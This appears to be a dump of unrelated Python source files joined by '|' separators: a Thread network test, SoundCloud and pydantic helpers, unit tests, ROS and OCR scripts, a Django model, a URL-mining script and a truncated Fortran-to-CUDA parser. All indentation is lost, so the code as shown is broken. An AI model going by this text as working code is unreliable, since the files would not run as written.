# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import time
import wpan
from wpan import verify
#-----------------------------------------------------------------------------------------------------------------------
# Test description:
#
# This test covers the situation for SED child (re)attaching to a parent with multiple IPv6 addresses present on the
# child.
test_name = __file__[:-3] if __file__.endswith('.py') else __file__
print '-' * 120
print 'Starting \'{}\''.format(test_name)
#-----------------------------------------------------------------------------------------------------------------------
# Utility functions
def verify_address(node_list, prefix):
"""
This function verifies that all nodes in the `node_list` contain an IPv6 address with the given `prefix`.
"""
for node in node_list:
all_addrs = wpan.parse_list(node.get(wpan.WPAN_IP6_ALL_ADDRESSES))
verify(any([addr.startswith(prefix[:-1]) for addr in all_addrs]))
#-----------------------------------------------------------------------------------------------------------------------
# Creating `wpan.Nodes` instances
speedup = 4
wpan.Node.set_time_speedup_factor(speedup)
parent = wpan.Node()
child = wpan.Node()
#-----------------------------------------------------------------------------------------------------------------------
# Init all nodes
wpan.Node.init_all_nodes()
#-----------------------------------------------------------------------------------------------------------------------
# Build network topology
parent.form('addr-test')
child.join_node(parent, node_type=wpan.JOIN_TYPE_SLEEPY_END_DEVICE)
child.set(wpan.WPAN_POLL_INTERVAL, '200')
all_nodes = [parent, child]
#-----------------------------------------------------------------------------------------------------------------------
# Test implementation
WAIT_TIME = 5
CHILD_SUPERVISION_CHECK_TIMEOUT = 1
prefix1 = 'fd00:1::'
prefix2 = 'fd00:2::'
prefix3 = 'fd00:3::'
prefix4 = 'fd00:4::'
# Add 4 prefixes (all with SLAAC bit set).
parent.add_prefix(prefix1, on_mesh=True, slaac=True, configure=True)
parent.add_prefix(prefix2, on_mesh=True, slaac=True, configure=True)
parent.add_prefix(prefix3, on_mesh=True, slaac=True, configure=True)
parent.add_prefix(prefix4, on_mesh=True, slaac=True, configure=True)
# Verify that the sleepy child gets all 4 SLAAC addresses.
def check_addresses_on_child():
verify_address([child], prefix1)
verify_address([child], prefix2)
verify_address([child], prefix3)
verify_address([child], prefix4)
wpan.verify_within(check_addresses_on_child, WAIT_TIME)
# Enable white-listing on parent.
parent.set(wpan.WPAN_MAC_WHITELIST_ENABLED, '1')
# Enable supervision check on child, this ensures that child is detached soon.
child.set(wpan.WPAN_CHILD_SUPERVISION_CHECK_TIMEOUT, str(CHILD_SUPERVISION_CHECK_TIMEOUT))
# Wait for child to get detached.
def check_child_is_detached():
verify(not child.is_associated())
wpan.verify_within(check_child_is_detached, WAIT_TIME)
# Now reset parent and wait for it to be associated.
parent.reset()
def check_parent_is_associated():
verify(parent.is_associated())
wpan.verify_within(check_parent_is_associated, WAIT_TIME)
# Now verify that child is indeed getting attached back.
def check_child_is_associated():
verify(child.is_associated())
wpan.verify_within(check_child_is_associated, WAIT_TIME)
# Any finally check that we see all the child addresses on the parent's child table.
def check_child_addressses_on_parent():
child_addrs = parent.get(wpan.WPAN_THREAD_CHILD_TABLE_ADDRESSES)
verify(child_addrs.find(prefix1) > 0)
verify(child_addrs.find(prefix2) > 0)
verify(child_addrs.find(prefix3) > 0)
verify(child_addrs.find(prefix4) > 0)
wpan.verify_within(check_child_addressses_on_parent, WAIT_TIME)
#-----------------------------------------------------------------------------------------------------------------------
# Test finished
wpan.Node.finalize_all_nodes()
print '\'{}\' passed.'.format(test_name)
|
from jupyter_client.managerabc import *
|
from .ipfs import *
|
from contextlib import suppress
from typing import Union, List
from requests.models import Response
from pysoundcloud.soundclouddata import SoundCloudData
from pysoundcloud.soundclouduser import SoundCloudUser
from pysoundcloud.soundcloudtrack import SoundCloudTrack
from pysoundcloud.soundcloudplaylist import SoundCloudPlaylist
class SoundCloudSearchResults:
response_json: dict = dict()
response_content: str = ""
url: str = ""
total_results: int = 0
next_href: str = ""
results: List[Union[SoundCloudUser, SoundCloudTrack, SoundCloudPlaylist]] = list()
"""
:var response_json: The json dict from the response
:var response_content: The str content from the response
:var url: The url for the search?
:var total_results: The total number of results for the search query
:var next_href: The link to the next page of results
:var results: All the results for the search query
"""
def __init__(self, response: Response, client_id: str = None, parent: "pysoundcloud.client.Client" = None) -> None:
"""
:param response: The requests response
:param client_id: The ID of the client
:param parent:
"""
self.response_json = response.json()
self.response_content = response.content.decode("utf-8")
self.url = response.url
self.total_results = self.response_json["total_results"]
with suppress(KeyError):
self.next_href = self.response_json["next_href"]
for i in range(len(self.response_json["collection"])):
kind = self.response_json["collection"][i]["kind"]
if (kind == "user"):
self.results.append(SoundCloudUser(self.response_json["collection"][i],
client_id))
elif (kind == "track"):
self.results.append(SoundCloudTrack(self.response_json["collection"][i],
client_id, parent=parent))
elif (kind == "playlist"):
self.results.append(SoundCloudPlaylist(self.response_json["collection"][i],
client_id))
else:
print(self.response_json["collection"][i]["kind"])
def __getitem__(self, item):
return self.results[item]
|
s = input()
print("x"*len(s))
|
from typing import TYPE_CHECKING, Any, get_args
import numpy
from openff.units import unit
class _FloatQuantityMeta(type):
def __getitem__(self, t):
return type("FloatQuantity", (FloatQuantity,), {"__unit__": t})
class FloatQuantity(float, metaclass=_FloatQuantityMeta):
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
if isinstance(val, float):
return val
expected_unit = unit.Unit(getattr(cls, "__unit__", Any))
if isinstance(val, unit.Quantity):
return val.to(expected_unit)
raise NotImplementedError()
class ArrayQuantityMeta(type):
def __getitem__(self, t):
return type("ArrayQuantity", (ArrayQuantity,), {"__unit__": t})
class ArrayQuantity(float, metaclass=ArrayQuantityMeta):
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
if isinstance(val, list):
val = numpy.array(val)
if isinstance(val, numpy.ndarray):
return val
unit_type = get_args(getattr(cls, "__unit__"))[0]
expected_unit = unit.Unit(unit_type)
if isinstance(val, unit.Quantity):
val = val.to(expected_unit).magnitude
assert isinstance(
val, numpy.ndarray
), f"invalid inner type of {type(val)}, expected a numpy array."
return val
raise NotImplementedError()
if TYPE_CHECKING:
FloatQuantity = float
ArrayQuantity = numpy.ndarray
|
import unittest
from firetower import redis_util
from firetower.category import Category, TimeSeries
def create_mock_category(id, sig, thresh, name):
"""Create a mock category object for testing purposes.
Args:
id: str, system referenc (hash when not a test obj).
sig: str, the signature we're matching against.
thresh: float, what ratio will match sig.
name: str, human-readable name.
"""
cat = Category(
redis_util.MockRedis(share_state=False),
cat_id=id)
cat._set_signature(sig)
cat._set_threshold(thresh)
cat._set_human(name)
return cat
class TestCategory(unittest.TestCase):
def setUp(self):
self.r = redis_util.MockRedis(share_state=False)
self.cat_id = "blah"
self.cat_sig = "database"
self.cat_thresh = 0.7
self.cat_name = "The ususal"
self.cat = create_mock_category(
self.cat_id,
self.cat_sig,
self.cat_thresh,
self.cat_name)
def test_category_create(self):
cat = Category.create(self.r, "new test category")
self.assertEqual(cat.signature, "new test category")
self.assertTrue(cat.cat_id)
def test_meta(self):
"""Test meta get/set methods"""
details = [
("signature", self.cat_sig, "new_cat_sig"),
("human_name", self.cat_name, "new_cat_name"),
("threshold", self.cat_thresh, 0.7)
]
for meta_name, old_value, new_value in details:
self.assertEqual(getattr(self.cat, meta_name), old_value)
self.set_meta(meta_name, new_value)
self.assertEqual(getattr(self.cat, meta_name), new_value)
def test_non_float_threshold(self):
self.set_meta("threshold", "banana")
def get_thresh():
return self.cat.threshold
self.assertRaises(ValueError, get_thresh)
def test_get_all_cats(self):
new_ids = ["foo", "bar", "baz"]
for new_id in new_ids:
self.r.hset(
Category.CAT_META_HASH,
"%s:signature" % (new_id), self.cat_sig
)
cats = Category.get_all_categories(self.r)
self.assertEqual(len(cats), len(new_ids) + 1)
for cat in cats:
self.assertEqual(cat.signature, self.cat_sig)
class TestTimeSeries(TestCase):
def add_ts(self, ts, count, cat_id=None):
if not cat_id:
cat_id = self.cat_id
self.r.zadd(
"ts_%s" % self.cat_id, TimeSeries.generate_ts_value(ts, count), ts
)
def setUp(self):
self.r = redis_util.MockRedis(share_state=False)
self.cat_id = "foobar"
self.time_series = TimeSeries(self.r, self.cat_id)
def test_get_all(self):
start_ts = 100
expected_counts = [1, 2, 3]
for i, count in enumerate(expected_counts):
self.add_ts(start_ts+i, count)
ts_list = self.time_series.all()
self.assertEqual(len(ts_list), len(expected_counts))
for ts, count in ts_list:
self.assertTrue(count in expected_counts)
def test_get_range(self):
for count, ts in enumerate(range(100, 120)):
self.add_ts(ts, count)
ts_list = self.time_series.range(110, 115)
self.assertEqual(len(ts_list), 6)
if __name__ == '__main__':
unittest.main()
|
print('welcome')
|
#! /usr/bin/env python
import clg
import os
import yaml
import yamlordereddictloader
CMD_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__),'subparsers.yml'))
def main():
cmd = clg.CommandLine(yaml.load(open(CMD_FILE),
Loader=yamlordereddictloader.Loader))
print(cmd.parse())
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#!coding=utf-8
import rospy
import numpy as np
import PIL.Image as pilimage
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
from yolo import YOLO
yolo = YOLO()
class image_converter:
def __init__(self):
# 创建cv_bridge,声明图像的发布者和订阅者
#self.image_pub = rospy.Publisher("cv_bridge_image", Image, queue_size=1)
#self.image_pub = rospy.Publisher("cv_bridge_image", MultiArrayLayout, queue_size=1)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/mid_camera/color/image_raw/compressed", CompressedImage, self.callback)
def callback(self,data):
# 使用cv_bridge将ROS的图像数据转换成OpenCV的图像格式
try:
cv_image = self.bridge.compressed_imgmsg_to_cv2(data, "bgr8")
except CvBridgeError as e:
print('e')
cv_image = cv2.cvtColor(cv_image,cv2.COLOR_BGR2RGB)
cv_image = pilimage.fromarray(np.uint8(cv_image))
cv_image, bbox_list, label_list = yolo.detect_image(cv_image)
cv_image = np.array(cv_image)
cv_image = cv2.cvtColor(cv_image,cv2.COLOR_RGB2BGR)
cv2.imshow("Image window", cv_image)
cv2.waitKey(3)
# 再将opencv格式额数据转换成ros image格式的数据发布
#try:
# self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, "bgr8"))
#self.image_pub.publish(self.bridge.cv2_to_imgmsg(bbox_list, MultiArrayLayout))
#except CvBridgeError as e:
# print('e')
if __name__ == '__main__':
try:
# 初始化ros节点
rospy.init_node("cv_bridge_test")
rospy.loginfo("Starting cv_bridge_test node")
image_converter()
rospy.spin()
except KeyboardInterrupt:
print("Shutting down cv_bridge_test node.")
cv2.destroyAllWindows()
|
#!/usr/bin/python
# -*-coding: utf-8 -*-
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import os
import re
import sys
import urllib
"""Logpuzzle exercise
Given an apache logfile, find the puzzle urls and download the images.
Here's what a puzzle url looks like:
10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] "GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0" 302 528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
"""
def myFunction(link_part):
return link_part.split('-')[2].split('.')[0]
def read_urls(filename):
"""Returns a list of the puzzle urls from the given log file, extracting the hostname from the filename itself.
Screens out duplicate urls and returns the urls sorted into increasing order."""
# +++your code here+++
f = open(filename,'r')
page = f.read()
f.close()
raw_urls = re.findall('GET \S*?(/images/puzzle\S*?) HTTP', page) # \S matches any non-space character
raw_urls = list(set(raw_urls))
raw_urls = sorted(raw_urls, key=myFunction)
urls = []
for link in raw_urls:
urls.append('https://developers.google.com/edu/python' + link)
# https://developers.google.com/edu/python/images/puzzle/a-baaa.jpg
#print(len(urls)) # Obs: len(urls) com seleção à procura de 'puzzle': 20; com seleção à procura de '\.jpg': 20
return urls
def download_images(img_urls, dest_dir):
"""Given the urls already in the correct order, downloads each image into the given directory.
Gives the images local filenames img0, img1, and so on.
Creates an index.html in the directory with an img tag to show each local image file.
Creates the directory if necessary.
"""
# +++your code here+++
# Verifica se o diretório informado já existe. Se não existir, cria-o.
print('Criou dir?')
print dest_dir
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
print('sim')
else:
print ('nao')
f_out = open(dest_dir + '/index.html', 'w')
f_out.writelines(['<html>\n','<body>\n'])
counter = 0
for link in img_urls:
urllib.urlretrieve(link, dest_dir + '/img' + str(counter))
f_out.write(' <img src="img' + str(counter) + '">\n')
counter += 1
f_out.writelines(['</body>\n','</html>'])
f_out.close()
return
def main():
args = sys.argv[1:]
if not args:
print('usage: [--todir dir] logfile ')
sys.exit(1)
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
img_urls = read_urls(args[0])
if todir:
download_images(img_urls, todir)
else:
print('\n'.join(img_urls))
if __name__ == '__main__':
main()
|
from mmocr.datasets import build_dataset
from mmcv import Config
from mmocr.apis import init_detector, model_inference
import os
from opencc import OpenCC
import cv2
import numpy as np
cc = OpenCC('s2t') # convert from Simplified Chinese to Traditional Chinese
path = os.path.join("work_dir", "order_imgs")
print(len(os.listdir(path)))
checkpoint = "./work_dir/sar_r31_parallel_decoder_chineseocr_20210507-b4be8214.pth"
config_file = "configs/textrecog/sar/sar_r31_parallel_decoder_chinese.py"
model = init_detector(config_file, checkpoint, device="cuda:0")
for index, i in enumerate(os.listdir(path)):
yolov5_output_dir = os.path.join(path, i)
ocr_result = ""
a = os.listdir(yolov5_output_dir)
a.sort()
for split_img in a:
#print(os.path.join(yolov5_output_dir, split_img))
img = cv2.imread(os.path.join(yolov5_output_dir, split_img))
#img = np.expand_dims(img, axis = 2)
img = cv2.resize(img, (128, 128))
"""
s = []
t = []
rotate_array = [90, 0, -90]
for i in range(3):
(h, w, d) = img.shape # 讀取圖片大小
center = (w // 2, h // 2) # 找到圖片中心
# 第一個參數旋轉中心,第二個參數旋轉角度(-順時針/+逆時針),第三個參數縮放比例
M = cv2.getRotationMatrix2D(center, rotate_array[i], 1.0)
# 第三個參數變化後的圖片大小
img = cv2.warpAffine(img, M, (w, h))
result = model_inference(model, img)
print(result)
s.append(result["score"])
t.append(result["text"])
print(np.argmax(s))
converted = cc.convert(t[np.argmax(s)])
"""
result = model_inference(model, img)
converted = cc.convert(result["text"])
if "/" in converted:
converted = converted.replace("/", "")
result["text"] = converted[0]
ocr_result += result["text"]
os.rename(yolov5_output_dir, yolov5_output_dir+"_"+ocr_result)
print(str(index) + "/" + str(len(os.listdir(path))))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 11 15:10:16 2020
@author: yujiang
"""
import datetime
def hello_world(param=2):
"""
this is to test how to use sphinx.ext.autodoc
:param var: (int) just a test a param (default is 2)
:param datetime: (int) just a test param (default is 1)
:return: (str) hello world time str
"""
today = datetime.date.today()
to_string = "hello world to {} in {}".format(param, today)
print(to_string)
return to_string
|
from django.db import models
from eworkshop.utils.models import TimeModel
class Profile(TimeModel):
"""Profile Model.
A profile holds user statistics and profile picture
"""
staff = models.OneToOneField('staff.Staff', on_delete=models.CASCADE)
picture = models.ImageField(
'profile picture',
upload_to='staff/pictures',
blank=True,
default='/images/avatar.jpg',
null=True
)
is_password_changed = models.BooleanField(default=False)
def __str__(self):
return self.staff.first_name
|
# Mine content from url_kb.sqlite3
################################################################################
# Import statements
################################################################################
import hashlib
import json
import logging
import pdb
import os
import sqlite3
# import random
# import threading
# import time
import uuid
from urlparse import urlparse
from datetime import datetime
#from helpers.app_helpers import *
#from helpers.app_helpers import *
################################################################################
# Setup logging configuration
################################################################################
logging_format = '%(asctime)-15s %(levelname)-8s %(message)s'
#logging_format = '%(asctime)-15s %(levelname)-8s %(module)-16s %(funcName)-24s %(message)s'
logging.basicConfig(filename='url-kb-mine.log', level=logging.DEBUG, format=logging_format) # Log to file
console_logger = logging.StreamHandler() # Log to console as well
console_logger.setFormatter(logging.Formatter(logging_format))
logging.getLogger().addHandler(console_logger)
########################################
# Define agnostic functions
########################################
def get_appconfig(repo_root_path):
app_config_filename = 'app_config.json'
app_config_filepath = os.path.join(repo_root_path, app_config_filename)
logging.debug("Opening file {0}".format(app_config_filename))
appconfig_file = open( app_config_filepath )
logging.debug("Loading file {0}".format(app_config_filename))
appconfig = json.load( appconfig_file )
logging.debug("app_config loaded")
return appconfig
################################################################################
# Variables dependent on Application basic functions
################################################################################
repo_root_path = os.path.dirname(os.getcwd())
appconfig = get_appconfig(repo_root_path)
SQLITE_FILENAME = os.path.join(repo_root_path, appconfig["url_dump"]["sqlite3_filename"])
AUTH_COOKIE_NAME = str(appconfig['application']["auth_cookie_name"])
# ZX: Trying a different approach
# keywords = {
# "SQLITE_FILENAME" : appconfig["url_dump"]["sqlite3_filename"],
# "AUTH_COOKIE_NAME" : str(appconfig['application']["auth_cookie_name"]),
# }
# const = lambda kw : keywords[kw]
################################################################################
# Constants
################################################################################
# SQLITE_FILENAME = appconfig["url_dump"]["sqlite3_filename"]
# AUTH_COOKIE_NAME = str(appconfig['application']["auth_cookie_name"])
################################################################################
# Classes
################################################################################
# N/A
################################################################################
# Functions
################################################################################
# N/A
def initialize_sqlite_db(sqlite_filename):
"""Initialize a sqlite3 database
Table(s) created:
1. raw_url
Args:
N/A
Returns:
N/A
"""
logging.info("[url_dump] - Ensuring existence of sqlite3 database [{0}]".format(sqlite_filename))
# Create directory if not exists
dirName = os.path.dirname(sqlite_filename)
if not os.path.isdir(dirName):
os.makedirs(dirName)
#create_raw_url_tabl(sqlite_filename)
def create_parsed_url_table(sqlite_filename):
"""Initialize a sqlite3 database
Tables created:
1. parsed_url
Args:
N/A
Returns:
N/A
"""
# Create any tables that we might need here
# ZX: Rememeber there are only 5 data types in Sqlite3: text, numeric, integer, real, blob
with sqlite3.connect(sqlite_filename) as conn:
cursor = conn.cursor()
cursor.execute('''CREATE TABLE IF NOT EXISTS parsed_url (
hexdigest text,
scheme text,
netloc text,
path text,
params text,
query text,
fragment text,
count integer,
timestamp text,
status integer,
PRIMARY KEY (hexdigest)
)''')
def process_raw_url(sqlite_filename):
timestamp = datetime.utcnow()
with sqlite3.connect(SQLITE_FILENAME) as conn:
raw_url_cursor = conn.cursor()
exec_cursor = conn.cursor()
# res = cursor.execute(
# "INSERT OR REPLACE INTO raw_url (timestamp, url, status) VALUES (?, ?, ?)",
# (timestamp, url, status)
# )
# Fetch all at one go
# cursor.execute("SELECT * FROM raw_url")
# rec = cursor.fetchall()
# Fetching one-by-one treating cursor as iterator
for row in raw_url_cursor.execute("SELECT * FROM raw_url WHERE Status = 0"):
print(row)
# raw_url_cursor.execute("SELECT * FROM raw_url")
# row = raw_url_cursor.fetchone()
md5_hash = hashlib.md5(row[2]).hexdigest()
parsed_res = urlparse(row[2])
rowhex_count = 0
exec_cursor.execute("SELECT * FROM parsed_url WHERE hexdigest = ?", (md5_hash,))
rec = exec_cursor.fetchone()
if rec is not None:
rowhex_count = rec[7]
rowhex_count = rowhex_count + 1
res = exec_cursor.execute(
"INSERT OR REPLACE INTO parsed_url (hexdigest, scheme, netloc, path, params, query, fragment, count, timestamp, status) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
(md5_hash, parsed_res.scheme, parsed_res.netloc, parsed_res.path, parsed_res.params, parsed_res.query, parsed_res.fragment, rowhex_count, timestamp, 0)
)
res = exec_cursor.execute(
"UPDATE raw_url SET status = 1 WHERE Id = ?",
(row[0],)
)
################################################################################
# Main function
################################################################################
if __name__ == '__main__':
logging.info("[PROGRAM START]")
# logging.critical("%8s test message %s" % ("CRITICAL", str(datetime.utcnow())))
# logging.error("%8s test message %s" % ("ERROR", str(datetime.utcnow())))
# logging.warning("%8s test message %s" % ("WARNING", str(datetime.utcnow())))
# logging.info("%8s test message %s" % ("INFO", str(datetime.utcnow())))
# logging.debug("%8s test message %s" % ("DEBUG", str(datetime.utcnow())))
# Parameters check
if not os.path.exists(SQLITE_FILENAME):
logging.error("SQLITE does not exists at {0}".format(SQLITE_FILENAME))
exit()
create_parsed_url_table(SQLITE_FILENAME)
# Initial modules that requires it
# N/A
# Do work here
# ----------
# timestamp = datetime.utcnow()
# with sqlite3.connect(SQLITE_FILENAME) as conn:
# raw_url_cursor = conn.cursor()
# exec_cursor = conn.cursor()
# # res = cursor.execute(
# # "INSERT OR REPLACE INTO raw_url (timestamp, url, status) VALUES (?, ?, ?)",
# # (timestamp, url, status)
# # )
# # Fetch all at one go
# # cursor.execute("SELECT * FROM raw_url")
# # rec = cursor.fetchall()
# # Fetching one-by-one treating cursor as iterator
# for row in raw_url_cursor.execute("SELECT * FROM raw_url WHERE Status = 0"):
# print(row)
# # raw_url_cursor.execute("SELECT * FROM raw_url")
# # row = raw_url_cursor.fetchone()
# md5_hash = hashlib.md5(row[2]).hexdigest()
# parsed_res = urlparse(row[2])
# rowhex_count = 0
# exec_cursor.execute("SELECT * FROM parsed_url WHERE hexdigest = ?", (md5_hash,))
# rec = exec_cursor.fetchone()
# if rec is not None:
# rowhex_count = rec[7]
# rowhex_count = rowhex_count + 1
# res = exec_cursor.execute(
# "INSERT OR REPLACE INTO parsed_url (hexdigest, scheme, netloc, path, params, query, fragment, count, timestamp, status) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
# (md5_hash, parsed_res.scheme, parsed_res.netloc, parsed_res.path, parsed_res.params, parsed_res.query, parsed_res.fragment, rowhex_count, timestamp, 0)
# )
# res = exec_cursor.execute(
# "UPDATE raw_url SET status = 1 WHERE Id = ?",
# (row[0],)
# )
# normalize do work to function
process_raw_url(SQLITE_FILENAME)
logging.info("[PROGRAM END]")
|
#!/usr/bin/env python3
#########################################################################################################
#
# MECCA - KPP Fortran to CUDA parser
#
# Copyright 2016-2020 The Cyprus Institute
#
# Developers: Michail Alvanos - m.alvanos@cyi.ac.cy
# Theodoros Christoudias - christoudias@cyi.ac.cy
# Giannis Ashiotis
#
#########################################################################################################
import os
import shutil
import re
import subprocess, string
import argparse
smcl = "../../smcl/"
def remove_comments(source):
print("Removing comments...")
lines = source[:]
lines.reverse()
out = []
while True:
if lines == []:
break
line = lines.pop()
if "!" in line:
if line[0] == "!":
continue
line = line[:line.find("!")-1]+"\n"
line = line.strip()
if (line != ''):
out.append(line)
return out
def strip_and_unroll_lines(source):
lines = source[:]
lines.reverse()
out = []
while True:
if lines == []:
break
line = lines.pop()
line = line.strip()
if line != "":
if line[-1] == "&":
line = line[0:-1].strip() + " "
while True:
next_line = lines.pop()
next_line = next_line.strip()
if next_line!= "" and next_line[0] == "&":
next_line = " " + next_line[1:].strip()
if "&" in next_line:
line = line + next_line[:-1]
else:
line = line + next_line
break
line = line + "\n"
out.append(line)
return out
def find_subroutines(file_in, subroutine_names):
subroutines = {}
for subroutine in subroutine_names:
subroutine = subroutine.lower()
file_in.seek(0)
lines = file_in.readlines()
lines.reverse()
source = []
while True:
if lines == []:
break
line = lines.pop().lower()
if ( (("subroutine "+subroutine + " ") in line.lower()) or (("subroutine "+subroutine + "(") in line.lower()) ):
while True:
if lines == []:
break
line = lines.pop()
if ( ("subroutine "+subroutine) in line.lower()):
break
source.append(line)
break
subroutines[subroutine.strip()] = source
return subroutines
def decapitalize_vars(source,keys):
fixed=[]
for i in range(len(source)):
line = source[i]
for key in keys:
key = key.lower()
key_len = len(key)
if key in line.lower():
index = 0
while True:
index = line.lower().find(key, index)
if index == -1:
break
line = line[:index]+key+line[index+key_len:]
index = index + key_len
fixed.append(line)
return fixed
def fix_power_op(source):
operators = "*/+-<>=.,"
# can use this in the future:
#(\(?[0-9,a-z,A-Z,_,+,-,/,., ,)]+\)?)\*\*(\(?[-,\d,+,.,a-zA-Z_,/, ,\t]+\)?)
#
var_name = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'
precision_qualifiers = ["_sp","_dp","_qp"]
fixed = []
for line in source:
if "**" in line:
index = len(line)
while True:
index = line.rfind("**",0, index-1)
if index == -1:
break
left = line[:index].strip()
right = line[index+2:].strip()
if right[0]=="(":
left_bra=0
right_bra = 0
pos = 0
for i in right:
if i == "(":
left_bra = left_bra + 1
elif i == ")":
right_bra = right_bra + 1
if left_bra == right_bra:
break
pos = pos + 1
exponent = right[1:pos]
right = right[pos+1:].strip()
else:
exponent = right
right = ""
if left[-1]==")": #if it's (...) or a3_(...)
left_bra=0
right_bra = 0
pos = 0
for i in reversed(left):
if i == "(":
left_bra = left_bra + 1
elif i == ")":
right_bra = right_bra + 1
if left_bra == right_bra:
break
pos = pos - 1
base = left[pos:-1].strip()
left = left[:pos-1].strip()
if left[-1] in var_name: #if it's a3_(...)
pos = 0
for i in reversed(left):
if i not in var_name:
break
pos = pos - 1
base = left[pos:].strip()+"("+base+")"
left = left[:pos].strip()
elif left[-3:].lower() in precision_qualifiers: # if it's 33._dp, 33.33E-33_dp or a_333_dp
if left[-4] == ".": # if it's 33._dp
pos=-4
for i in reversed(left[:-4]):
if i not in string.digits:
if pos == -4:
print("ERROR 1 in \"parser\" \n")
break
pos = pos -1
base = left[pos:-3]
left = left[:pos].strip()
elif left[-4] in var_name: # if it's 33.33E-33_dp or a_333_dp
pos=-3
scientif = False
isnumber = True
for i in reversed(left[:-3]):
if i not in string.digits+".":
if (i in "+-") and abs(pos-2)<=len(left) and (left[pos-2].lower() == "e"):
scientif = True
elif scientif and i.lower() == "e":
pass
elif i in string.letters+"_": # if it's a_333_dp
pos=-3
for i in reversed(left[:-3]):
if i not in var_name:
break
pos = pos - 1
isnumber = False
break
else:
break
pos = pos - 1
base = left[pos:-3]+((not isnumber) and (not scientif))*left[-3:]
left = left[:pos].strip()
else: # if it's 3. , 3.3E-33 or a_3
if left[-1] == ".": # if it's 33.
pos=-1
for i in reversed(left[:-1]):
if i not in string.digits:
if pos == -1:
print("ERROR 2 in \"parser\" \n")
break
pos = pos - 1
base = left[pos:]
left = left[:pos].strip()
elif left[-1] in var_name: # if it's 33.33E-33 or a_3
pos=0
scientif = False
isnumber = True
for i in reversed(left):
if i not in string.digits+".":
if (i in "+-") and abs(pos-2)<=len(left) and (left[pos-2].lower() == "e"):
scientif = True
elif scientif and i.lower() == "e":
pass
elif i in string.letters+"_": # if it's a_3
pos=0
for i in reversed(left):
if i not in var_name:
break
pos = pos - 1
isnumber = False
break
else:
break
pos = pos - 1
#base = left[pos:]+((not isnumber) and (not scientif))*left[:]
base = left[pos:]
left = left[:pos].strip()
else:
print("OOPS! Missed something...")
line = left+" pow("+base+", "+ exponent+") "+right+"\n"
fixed.append(line)
return fixed
def strip_lines(source):
stripped = []
for line in source:
stripped.append(line.strip())
return stripped
def split_beta(source,key):
the_line = 0
for line_num in range(len(source)):
if source[line_num].strip()[0:len(key)] == key:
the_line = line_num
break
main_body = []
for line_num in range(the_line,len(source)):
if "return" in source[line_num].lower():
source[line_num] = ""
main_body.append(source[line_num])
return main_body
def fix_indices(source,keys):
lines = source[:]
lines.reverse()
processed = []
while True:
if lines == []:
break
line = lines.pop()
for var in keys:
if var[0]+"(" in line:
index = 0
while True:
index = line.find(var[0]+"(", index)
if index == -1:
break
if len(var) == 2:
extra = ""
elif len(var) == 3:
extra = var[2]+","
else:
raise ValueError
if ((line[index+len(var[0])+1:line.find(")",index)]).strip().isdigit()):
line = line[:index]+var[1]+"(index,"+extra+str(int(line[index+len(var[0])+1:line.find(")",index)])-1)+line[line.find(")",index):].replace(")=",") =")
else:
print("Value error : "+ str(line[index+len(var[0])+1:line.find(")",index)]))
raise ValueError
index = index + len(var[1])+1
processed.append(line.strip())
return processed
pass
#########################################################################################################
#########################################################################################################
def split_rconst(source):
lines = source[:]
lines.reverse()
rconst_decls = []
rconst_ops = []
while True:
if lines == []:
break
line = lines.pop()
if line[0:6].lower() == "rconst":
rconst_ops.append(line)
elif ("=" in line) and (line.find("=") > 2):
rconst_decls.append(line)
return rconst_ops,rconst_decls
def rconst_preprocessor_1(source):
lines = source[:]
lines.reverse()
file_temp = open("file_temp.c","w")
file_temp.write("#define rconst(i) rconst(index,i)\n")
file_temp.write("#define jx(i,j) jx(index,j)\n")
file_temp.write("#define khet_st(i,j) khet_st(index,j)\n")
file_temp.write("#define khet_tr(i,j) khet_tr(index,j)\n")
file_temp.write("#define exp(i) exp(i)\n")
file_temp.write("#define C(i) var[i]\n")
file_temp.write("#define c(i) var[i]\n")
file_temp.write("#define REAL( i, SP) (i)\n")
file_temp.write("#define temp(i) temp_loc\n")
file_temp.write("#define cair(i) cair_loc\n")
file_temp.write("#define press(i) press_loc\n")
file_temp.write("#define log(i) log(i)\n")
while True:
if lines == []:
break
line = lines.pop()
if "rconst" in line:
index = 0
while True:
index = line.find("rconst(", index)
if index == -1:
break
